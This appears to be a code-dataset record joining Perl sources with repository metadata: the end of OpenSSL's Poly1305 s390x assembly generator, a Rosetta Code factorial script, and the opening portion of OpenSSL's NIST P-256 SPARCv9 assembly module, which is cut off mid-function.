vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
&{$z? \&clgfi:\&clfi} ($len,0);
je (".Ldone");
vlm ($T1,$T4,"0x00($inp)"); # load last partial block
vgmg ($mask26,6,31);
vgmf ($I4,5,5); # padbit<<2
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
vl ($ACC0,"0x30($len,%r1)"); # borrow $ACC0,1
vl ($ACC1,"0x60($len,%r1)");
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
vperm ($H0,$H0,$H0,$ACC0); # move hash to right lane
vn ($I0,$I0,$ACC1); # mask redundant lane[s]
vperm ($H1,$H1,$H1,$ACC0);
vn ($I1,$I1,$ACC1);
vperm ($H2,$H2,$H2,$ACC0);
vn ($I2,$I2,$ACC1);
vperm ($H3,$H3,$H3,$ACC0);
vn ($I3,$I3,$ACC1);
vperm ($H4,$H4,$H4,$ACC0);
vn ($I4,$I4,$ACC1);
vaf ($I0,$I0,$H0); # accumulate hash
vzero ($H0); # wipe hash value
vaf ($I1,$I1,$H1);
vzero ($H1);
vaf ($I2,$I2,$H2);
vzero ($H2);
vaf ($I3,$I3,$H3);
vzero ($H3);
vaf ($I4,$I4,$H4);
vzero ($H4);
&{$z? \&lghi:\&lhi} ($len,0);
j (".Last");
# I don't bother to tell apart cases when only one multiplication
# pass is sufficient, because I argue that mispredicted branch
# penalties are comparable to overhead of sometimes redundant
# multiplication pass...
LABEL (".Ldone");
vstef ($H0,"0($ctx)",3); # store hash base 2^26
vstef ($H1,"4($ctx)",3);
vstef ($H2,"8($ctx)",3);
vstef ($H3,"12($ctx)",3);
vstef ($H4,"16($ctx)",3);
if ($z) {
ld ("%f8","$stdframe+0*8($sp)");
ld ("%f9","$stdframe+1*8($sp)");
ld ("%f10","$stdframe+2*8($sp)");
ld ("%f11","$stdframe+3*8($sp)");
ld ("%f12","$stdframe+4*8($sp)");
ld ("%f13","$stdframe+5*8($sp)");
ld ("%f14","$stdframe+6*8($sp)");
ld ("%f15","$stdframe+7*8($sp)");
&{$z? \&lmg:\&lm} ("%r10","%r15","$stdframe+8*8+10*$SIZE_T($sp)");
} else {
ld ("%f4","$stdframe+16*$SIZE_T+2*8($sp)");
ld ("%f6","$stdframe+16*$SIZE_T+3*8($sp)");
&{$z? \&lmg:\&lm} ("%r10","%r15","$stdframe+10*$SIZE_T($sp)");
}
br ("%r14");
SIZE ("__poly1305_blocks_vx",".-__poly1305_blocks_vx");
}
################
# static void poly1305_emit(void *ctx, unsigned char mac[16],
# const u32 nonce[4])
{
my ($mac,$nonce)=($inp,$len);
my ($h0,$h1,$h2,$d0,$d1,$d2)=map("%r$_",(5..10));
GLOBL ("poly1305_emit");
TYPE ("poly1305_emit","\@function");
ALIGN (16);
LABEL ("poly1305_emit");
LABEL (".Lpoly1305_emit");
&{$z? \&stmg:\&stm} ("%r6","%r10","6*$SIZE_T($sp)");
lg ($d0,"0($ctx)");
lg ($d1,"8($ctx)");
lg ($d2,"16($ctx)");
llgfr ("%r0",$d0); # base 2^26 -> base 2^64
srlg ($h0,$d0,32);
llgfr ("%r1",$d1);
srlg ($h1,$d1,32);
srlg ($h2,$d2,32);
sllg ("%r0","%r0",26);
algr ($h0,"%r0");
sllg ("%r0",$h1,52);
srlg ($h1,$h1,12);
sllg ("%r1","%r1",14);
algr ($h0,"%r0");
alcgr ($h1,"%r1");
sllg ("%r0",$h2,40);
srlg ($h2,$h2,24);
lghi ("%r1",0);
algr ($h1,"%r0");
alcgr ($h2,"%r1");
llgf ("%r0","24($ctx)"); # is_base2_26
lcgr ("%r0","%r0");
xgr ($h0,$d0); # choose between radixes
xgr ($h1,$d1);
xgr ($h2,$d2);
ngr ($h0,"%r0");
ngr ($h1,"%r0");
ngr ($h2,"%r0");
xgr ($h0,$d0);
xgr ($h1,$d1);
xgr ($h2,$d2);
lghi ("%r0",5);
lgr ($d0,$h0);
lgr ($d1,$h1);
algr ($h0,"%r0"); # compare to modulus
alcgr ($h1,"%r1");
alcgr ($h2,"%r1");
srlg ($h2,$h2,2); # did it borrow/carry?
slgr ("%r1",$h2); # 0-$h2>>2
lg ($d2,"0($nonce)"); # load nonce
lg ($ctx,"8($nonce)");
xgr ($h0,$d0);
xgr ($h1,$d1);
ngr ($h0,"%r1");
ngr ($h1,"%r1");
xgr ($h0,$d0);
rllg ($d0,$d2,32); # flip nonce words
xgr ($h1,$d1);
rllg ($d1,$ctx,32);
algr ($h0,$d0); # accumulate nonce
alcgr ($h1,$d1);
strvg ($h0,"0($mac)"); # write little-endian result
strvg ($h1,"8($mac)");
&{$z? \&lmg:\&lm} ("%r6","%r10","6*$SIZE_T($sp)");
br ("%r14");
SIZE ("poly1305_emit",".-poly1305_emit");
}
################
ALIGN (16);
LABEL (".Lconst");
LONG (0x04050607,0x14151617,0x0c0d0e0f,0x1c1d1e1f); # merge odd
LONG (0x07060504,0x03020100,0x17161514,0x13121110); # byte swap masks
LONG (0x0f0e0d0c,0x0b0a0908,0x1f1e1d1c,0x1b1a1918);
LONG (0x00000000,0x09080706,0x00000000,0x19181716);
LONG (0x00000000,0x00000000,0x00000000,0x0c0d0e0f); # magic tail masks
LONG (0x0c0d0e0f,0x00000000,0x00000000,0x00000000);
LONG (0x00000000,0x00000000,0x0c0d0e0f,0x00000000);
LONG (0xffffffff,0x00000000,0xffffffff,0xffffffff);
LONG (0xffffffff,0x00000000,0xffffffff,0x00000000);
LONG (0x00000000,0x00000000,0xffffffff,0x00000000);
STRING ("\"Poly1305 for s390x, CRYPTOGAMS by <appro\@openssl.org>\"");
PERLASM_END();
| 24.825381 | 76 | 0.5338 |
ed8822323977c360695a2dc9a7601c992ce4d5f6 | 214 | pl | Perl | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:38.000Z | 2018-11-09T22:08:38.000Z | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | null | null | null | Task/Factorial/Perl/factorial-1.pl | mullikine/RosettaCodeData | 4f0027c6ce83daa36118ee8b67915a13cd23ab67 | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | sub factorial
{
my $n = shift;
my $result = 1;
for (my $i = 1; $i <= $n; ++$i)
{
$result *= $i;
};
$result;
}
# using a .. range
sub factorial {
my $r = 1;
$r *= $_ for 1..shift;
$r;
}
| 11.888889 | 33 | 0.425234 |
ed95b200f3551e725b790fb61f6910589e6bfa1c | 77,864 | pl | Perl | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null | crypto/ec/asm/ecp_nistz256-sparcv9.pl | BPLSNico/openssl | f8f686ec1cda6a077ec9d5c2ab540cf202059279 | [
"OpenSSL"
] | null | null | null | #! /usr/bin/env perl
# Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the OpenSSL license (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# ECP_NISTZ256 module for SPARCv9.
#
# February 2015.
#
# Original ECP_NISTZ256 submission targeting x86_64 is detailed in
# http://eprint.iacr.org/2013/816. In the process of adaptation
# original .c module was made 32-bit savvy in order to make this
# implementation possible.
#
# with/without -DECP_NISTZ256_ASM
# UltraSPARC III +12-18%
# SPARC T4 +99-550% (+66-150% on 32-bit Solaris)
#
# Ranges denote minimum and maximum improvement coefficients depending
# on benchmark. Lower coefficients are for ECDSA sign, server-side
# operation. Keep in mind that +200% means 3x improvement.
$output = pop;
open STDOUT,">$output";
$code.=<<___;
#include "sparc_arch.h"
#define LOCALS (STACK_BIAS+STACK_FRAME)
#ifdef __arch64__
.register %g2,#scratch
.register %g3,#scratch
# define STACK64_FRAME STACK_FRAME
# define LOCALS64 LOCALS
#else
# define STACK64_FRAME (2047+192)
# define LOCALS64 STACK64_FRAME
#endif
.section ".text",#alloc,#execinstr
___
########################################################################
# Convert ecp_nistz256_table.c to layout expected by ecp_nistz_gather_w7
#
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
open TABLE,"<ecp_nistz256_table.c" or
open TABLE,"<${dir}../ecp_nistz256_table.c" or
die "failed to open ecp_nistz256_table.c:",$!;
use integer;
foreach(<TABLE>) {
s/TOBN\(\s*(0x[0-9a-f]+),\s*(0x[0-9a-f]+)\s*\)/push @arr,hex($2),hex($1)/geo;
}
close TABLE;
# See ecp_nistz256_table.c for explanation for why it's 64*16*37.
# 64*16*37-1 is because $#arr returns last valid index or @arr, not
# amount of elements.
die "insane number of elements" if ($#arr != 64*16*37-1);
$code.=<<___;
.globl ecp_nistz256_precomputed
.align 4096
ecp_nistz256_precomputed:
___
########################################################################
# this conversion smashes P256_POINT_AFFINE by individual bytes with
# 64 byte interval, similar to
# 1111222233334444
# 1234123412341234
for(1..37) {
@tbl = splice(@arr,0,64*16);
for($i=0;$i<64;$i++) {
undef @line;
for($j=0;$j<64;$j++) {
push @line,(@tbl[$j*16+$i/4]>>(($i%4)*8))&0xff;
}
$code.=".byte\t";
$code.=join(',',map { sprintf "0x%02x",$_} @line);
$code.="\n";
}
}
{{{
my ($rp,$ap,$bp)=map("%i$_",(0..2));
my @acc=map("%l$_",(0..7));
my ($t0,$t1,$t2,$t3,$t4,$t5,$t6,$t7)=(map("%o$_",(0..5)),"%g4","%g5");
my ($bi,$a0,$mask,$carry)=(map("%i$_",(3..5)),"%g1");
my ($rp_real,$ap_real)=("%g2","%g3");
$code.=<<___;
.size ecp_nistz256_precomputed,.-ecp_nistz256_precomputed
.align 64
.LRR: ! 2^512 mod P precomputed for NIST P256 polynomial
.long 0x00000003, 0x00000000, 0xffffffff, 0xfffffffb
.long 0xfffffffe, 0xffffffff, 0xfffffffd, 0x00000004
.Lone:
.long 1,0,0,0,0,0,0,0
.asciz "ECP_NISTZ256 for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
! void ecp_nistz256_to_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_to_mont
.align 64
ecp_nistz256_to_mont:
save %sp,-STACK_FRAME,%sp
nop
1: call .+8
add %o7,.LRR-1b,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_to_mont,.-ecp_nistz256_to_mont
! void ecp_nistz256_from_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_from_mont
.align 32
ecp_nistz256_from_mont:
save %sp,-STACK_FRAME,%sp
nop
1: call .+8
add %o7,.Lone-1b,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_from_mont,.-ecp_nistz256_from_mont
! void ecp_nistz256_mul_mont(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_mul_mont
.align 32
ecp_nistz256_mul_mont:
save %sp,-STACK_FRAME,%sp
nop
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
! void ecp_nistz256_sqr_mont(BN_ULONG %i0[8],const BN_ULONG %i2[8]);
.globl ecp_nistz256_sqr_mont
.align 32
ecp_nistz256_sqr_mont:
save %sp,-STACK_FRAME,%sp
mov $ap,$bp
call __ecp_nistz256_mul_mont
nop
ret
restore
.size ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
___
########################################################################
# Special thing to keep in mind is that $t0-$t7 hold 64-bit values,
# while all others are meant to keep 32. "Meant to" means that additions
# to @acc[0-7] do "contaminate" upper bits, but they are cleared before
# they can affect outcome (follow 'and' with $mask). Also keep in mind
# that addition with carry is addition with 32-bit carry, even though
# CPU is 64-bit. [Addition with 64-bit carry was introduced in T3, see
# below for VIS3 code paths.]
$code.=<<___;
.align 32
__ecp_nistz256_mul_mont:
ld [$bp+0],$bi ! b[0]
mov -1,$mask
ld [$ap+0],$a0
srl $mask,0,$mask ! 0xffffffff
ld [$ap+4],$t1
ld [$ap+8],$t2
ld [$ap+12],$t3
ld [$ap+16],$t4
ld [$ap+20],$t5
ld [$ap+24],$t6
ld [$ap+28],$t7
mulx $a0,$bi,$t0 ! a[0-7]*b[0], 64-bit results
mulx $t1,$bi,$t1
mulx $t2,$bi,$t2
mulx $t3,$bi,$t3
mulx $t4,$bi,$t4
mulx $t5,$bi,$t5
mulx $t6,$bi,$t6
mulx $t7,$bi,$t7
srlx $t0,32,@acc[1] ! extract high parts
srlx $t1,32,@acc[2]
srlx $t2,32,@acc[3]
srlx $t3,32,@acc[4]
srlx $t4,32,@acc[5]
srlx $t5,32,@acc[6]
srlx $t6,32,@acc[7]
srlx $t7,32,@acc[0] ! "@acc[8]"
mov 0,$carry
___
for($i=1;$i<8;$i++) {
$code.=<<___;
addcc @acc[1],$t1,@acc[1] ! accumulate high parts
ld [$bp+4*$i],$bi ! b[$i]
ld [$ap+4],$t1 ! re-load a[1-7]
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
ld [$ap+8],$t2
ld [$ap+12],$t3
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
ld [$ap+16],$t4
ld [$ap+20],$t5
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
ld [$ap+24],$t6
ld [$ap+28],$t7
addccc @acc[0],$carry,@acc[0] ! "@acc[8]"
addc %g0,%g0,$carry
___
# Reduction iteration is normally performed by accumulating
# result of multiplication of modulus by "magic" digit [and
# omitting least significant word, which is guaranteed to
# be 0], but thanks to special form of modulus and "magic"
# digit being equal to least significant word, it can be
# performed with additions and subtractions alone. Indeed:
#
# ffff.0001.0000.0000.0000.ffff.ffff.ffff
# * abcd
# + xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.abcd
#
# Now observing that ff..ff*x = (2^n-1)*x = 2^n*x-x, we
# rewrite above as:
#
# xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.abcd
# + abcd.0000.abcd.0000.0000.abcd.0000.0000.0000
# - abcd.0000.0000.0000.0000.0000.0000.abcd
#
# or marking redundant operations:
#
# xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.xxxx.----
# + abcd.0000.abcd.0000.0000.abcd.----.----.----
# - abcd.----.----.----.----.----.----.----
$code.=<<___;
! multiplication-less reduction
addcc @acc[3],$t0,@acc[3] ! r[3]+=r[0]
addccc @acc[4],%g0,@acc[4] ! r[4]+=0
and @acc[1],$mask,@acc[1]
and @acc[2],$mask,@acc[2]
addccc @acc[5],%g0,@acc[5] ! r[5]+=0
addccc @acc[6],$t0,@acc[6] ! r[6]+=r[0]
and @acc[3],$mask,@acc[3]
and @acc[4],$mask,@acc[4]
addccc @acc[7],%g0,@acc[7] ! r[7]+=0
addccc @acc[0],$t0,@acc[0] ! r[8]+=r[0] "@acc[8]"
and @acc[5],$mask,@acc[5]
and @acc[6],$mask,@acc[6]
addc $carry,%g0,$carry ! top-most carry
subcc @acc[7],$t0,@acc[7] ! r[7]-=r[0]
subccc @acc[0],%g0,@acc[0] ! r[8]-=0 "@acc[8]"
subc $carry,%g0,$carry ! top-most carry
and @acc[7],$mask,@acc[7]
and @acc[0],$mask,@acc[0] ! "@acc[8]"
___
push(@acc,shift(@acc)); # rotate registers to "omit" acc[0]
$code.=<<___;
mulx $a0,$bi,$t0 ! a[0-7]*b[$i], 64-bit results
mulx $t1,$bi,$t1
mulx $t2,$bi,$t2
mulx $t3,$bi,$t3
mulx $t4,$bi,$t4
mulx $t5,$bi,$t5
mulx $t6,$bi,$t6
mulx $t7,$bi,$t7
add @acc[0],$t0,$t0 ! accumulate low parts, can't overflow
add @acc[1],$t1,$t1
srlx $t0,32,@acc[1] ! extract high parts
add @acc[2],$t2,$t2
srlx $t1,32,@acc[2]
add @acc[3],$t3,$t3
srlx $t2,32,@acc[3]
add @acc[4],$t4,$t4
srlx $t3,32,@acc[4]
add @acc[5],$t5,$t5
srlx $t4,32,@acc[5]
add @acc[6],$t6,$t6
srlx $t5,32,@acc[6]
add @acc[7],$t7,$t7
srlx $t6,32,@acc[7]
srlx $t7,32,@acc[0] ! "@acc[8]"
___
}
$code.=<<___;
addcc @acc[1],$t1,@acc[1] ! accumulate high parts
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
addccc @acc[0],$carry,@acc[0] ! "@acc[8]"
addc %g0,%g0,$carry
addcc @acc[3],$t0,@acc[3] ! multiplication-less reduction
addccc @acc[4],%g0,@acc[4]
addccc @acc[5],%g0,@acc[5]
addccc @acc[6],$t0,@acc[6]
addccc @acc[7],%g0,@acc[7]
addccc @acc[0],$t0,@acc[0] ! "@acc[8]"
addc $carry,%g0,$carry
subcc @acc[7],$t0,@acc[7]
subccc @acc[0],%g0,@acc[0] ! "@acc[8]"
subc $carry,%g0,$carry ! top-most carry
___
push(@acc,shift(@acc)); # rotate registers to omit acc[0]
$code.=<<___;
! Final step is "if result > mod, subtract mod", but we do it
! "other way around", namely subtract modulus from result
! and if it borrowed, add modulus back.
subcc @acc[0],-1,@acc[0] ! subtract modulus
subccc @acc[1],-1,@acc[1]
subccc @acc[2],-1,@acc[2]
subccc @acc[3],0,@acc[3]
subccc @acc[4],0,@acc[4]
subccc @acc[5],0,@acc[5]
subccc @acc[6],1,@acc[6]
subccc @acc[7],-1,@acc[7]
subc $carry,0,$carry ! broadcast borrow bit
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
addcc @acc[0],$carry,@acc[0] ! add modulus or zero
addccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
addccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
addccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
addccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
addccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
addccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
addc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_mul_mont,.-__ecp_nistz256_mul_mont
! void ecp_nistz256_add(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_add
.align 32
ecp_nistz256_add:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_add
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_add,.-ecp_nistz256_add
.align 32
__ecp_nistz256_add:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
addcc @acc[0],$t0,@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
addccc @acc[1],$t1,@acc[1]
ld [$bp+24],$t6
ld [$bp+28],$t7
addccc @acc[2],$t2,@acc[2]
addccc @acc[3],$t3,@acc[3]
addccc @acc[4],$t4,@acc[4]
addccc @acc[5],$t5,@acc[5]
addccc @acc[6],$t6,@acc[6]
addccc @acc[7],$t7,@acc[7]
subc %g0,%g0,$carry ! broadcast carry bit
.Lreduce_by_sub:
! if a+b carries, subtract modulus.
!
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
subcc @acc[0],$carry,@acc[0] ! subtract synthesized modulus
subccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
subccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
subccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
subccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
subccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
subccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
subc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_add,.-__ecp_nistz256_add
! void ecp_nistz256_mul_by_2(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_mul_by_2
.align 32
ecp_nistz256_mul_by_2:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_mul_by_2
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_mul_by_2,.-ecp_nistz256_mul_by_2
.align 32
__ecp_nistz256_mul_by_2:
addcc @acc[0],@acc[0],@acc[0] ! a+a=2*a
addccc @acc[1],@acc[1],@acc[1]
addccc @acc[2],@acc[2],@acc[2]
addccc @acc[3],@acc[3],@acc[3]
addccc @acc[4],@acc[4],@acc[4]
addccc @acc[5],@acc[5],@acc[5]
addccc @acc[6],@acc[6],@acc[6]
addccc @acc[7],@acc[7],@acc[7]
b .Lreduce_by_sub
subc %g0,%g0,$carry ! broadcast carry bit
.size __ecp_nistz256_mul_by_2,.-__ecp_nistz256_mul_by_2
! void ecp_nistz256_mul_by_3(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_mul_by_3
.align 32
ecp_nistz256_mul_by_3:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_mul_by_3
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_mul_by_3,.-ecp_nistz256_mul_by_3
.align 32
__ecp_nistz256_mul_by_3:
addcc @acc[0],@acc[0],$t0 ! a+a=2*a
addccc @acc[1],@acc[1],$t1
addccc @acc[2],@acc[2],$t2
addccc @acc[3],@acc[3],$t3
addccc @acc[4],@acc[4],$t4
addccc @acc[5],@acc[5],$t5
addccc @acc[6],@acc[6],$t6
addccc @acc[7],@acc[7],$t7
subc %g0,%g0,$carry ! broadcast carry bit
subcc $t0,$carry,$t0 ! .Lreduce_by_sub but without stores
neg $carry,$bi
subccc $t1,$carry,$t1
subccc $t2,$carry,$t2
subccc $t3,0,$t3
subccc $t4,0,$t4
subccc $t5,0,$t5
subccc $t6,$bi,$t6
subc $t7,$carry,$t7
addcc $t0,@acc[0],@acc[0] ! 2*a+a=3*a
addccc $t1,@acc[1],@acc[1]
addccc $t2,@acc[2],@acc[2]
addccc $t3,@acc[3],@acc[3]
addccc $t4,@acc[4],@acc[4]
addccc $t5,@acc[5],@acc[5]
addccc $t6,@acc[6],@acc[6]
addccc $t7,@acc[7],@acc[7]
b .Lreduce_by_sub
subc %g0,%g0,$carry ! broadcast carry bit
.size __ecp_nistz256_mul_by_3,.-__ecp_nistz256_mul_by_3
! void ecp_nistz256_sub(BN_ULONG %i0[8],const BN_ULONG %i1[8],
! const BN_ULONG %i2[8]);
.globl ecp_nistz256_sub
.align 32
ecp_nistz256_sub:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_sub_from
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_sub,.-ecp_nistz256_sub
! void ecp_nistz256_neg(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_neg
.align 32
ecp_nistz256_neg:
save %sp,-STACK_FRAME,%sp
mov $ap,$bp
mov 0,@acc[0]
mov 0,@acc[1]
mov 0,@acc[2]
mov 0,@acc[3]
mov 0,@acc[4]
mov 0,@acc[5]
mov 0,@acc[6]
call __ecp_nistz256_sub_from
mov 0,@acc[7]
ret
restore
.size ecp_nistz256_neg,.-ecp_nistz256_neg
.align 32
__ecp_nistz256_sub_from:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
subcc @acc[0],$t0,@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
subccc @acc[1],$t1,@acc[1]
subccc @acc[2],$t2,@acc[2]
ld [$bp+24],$t6
ld [$bp+28],$t7
subccc @acc[3],$t3,@acc[3]
subccc @acc[4],$t4,@acc[4]
subccc @acc[5],$t5,@acc[5]
subccc @acc[6],$t6,@acc[6]
subccc @acc[7],$t7,@acc[7]
subc %g0,%g0,$carry ! broadcast borrow bit
.Lreduce_by_add:
! if a-b borrows, add modulus.
!
! Note that because mod has special form, i.e. consists of
! 0xffffffff, 1 and 0s, we can conditionally synthesize it by
! using value of broadcasted borrow and the borrow bit itself.
! To minimize dependency chain we first broadcast and then
! extract the bit by negating (follow $bi).
addcc @acc[0],$carry,@acc[0] ! add synthesized modulus
addccc @acc[1],$carry,@acc[1]
neg $carry,$bi
st @acc[0],[$rp]
addccc @acc[2],$carry,@acc[2]
st @acc[1],[$rp+4]
addccc @acc[3],0,@acc[3]
st @acc[2],[$rp+8]
addccc @acc[4],0,@acc[4]
st @acc[3],[$rp+12]
addccc @acc[5],0,@acc[5]
st @acc[4],[$rp+16]
addccc @acc[6],$bi,@acc[6]
st @acc[5],[$rp+20]
addc @acc[7],$carry,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_sub_from,.-__ecp_nistz256_sub_from
.align 32
__ecp_nistz256_sub_morf:
ld [$bp+0],$t0 ! b[0]
ld [$bp+4],$t1
ld [$bp+8],$t2
ld [$bp+12],$t3
subcc $t0,@acc[0],@acc[0]
ld [$bp+16],$t4
ld [$bp+20],$t5
subccc $t1,@acc[1],@acc[1]
subccc $t2,@acc[2],@acc[2]
ld [$bp+24],$t6
ld [$bp+28],$t7
subccc $t3,@acc[3],@acc[3]
subccc $t4,@acc[4],@acc[4]
subccc $t5,@acc[5],@acc[5]
subccc $t6,@acc[6],@acc[6]
subccc $t7,@acc[7],@acc[7]
b .Lreduce_by_add
subc %g0,%g0,$carry ! broadcast borrow bit
.size __ecp_nistz256_sub_morf,.-__ecp_nistz256_sub_morf
! void ecp_nistz256_div_by_2(BN_ULONG %i0[8],const BN_ULONG %i1[8]);
.globl ecp_nistz256_div_by_2
.align 32
ecp_nistz256_div_by_2:
save %sp,-STACK_FRAME,%sp
ld [$ap],@acc[0]
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
call __ecp_nistz256_div_by_2
ld [$ap+28],@acc[7]
ret
restore
.size ecp_nistz256_div_by_2,.-ecp_nistz256_div_by_2
.align 32
__ecp_nistz256_div_by_2:
! ret = (a is odd ? a+mod : a) >> 1
and @acc[0],1,$bi
neg $bi,$carry
addcc @acc[0],$carry,@acc[0]
addccc @acc[1],$carry,@acc[1]
addccc @acc[2],$carry,@acc[2]
addccc @acc[3],0,@acc[3]
addccc @acc[4],0,@acc[4]
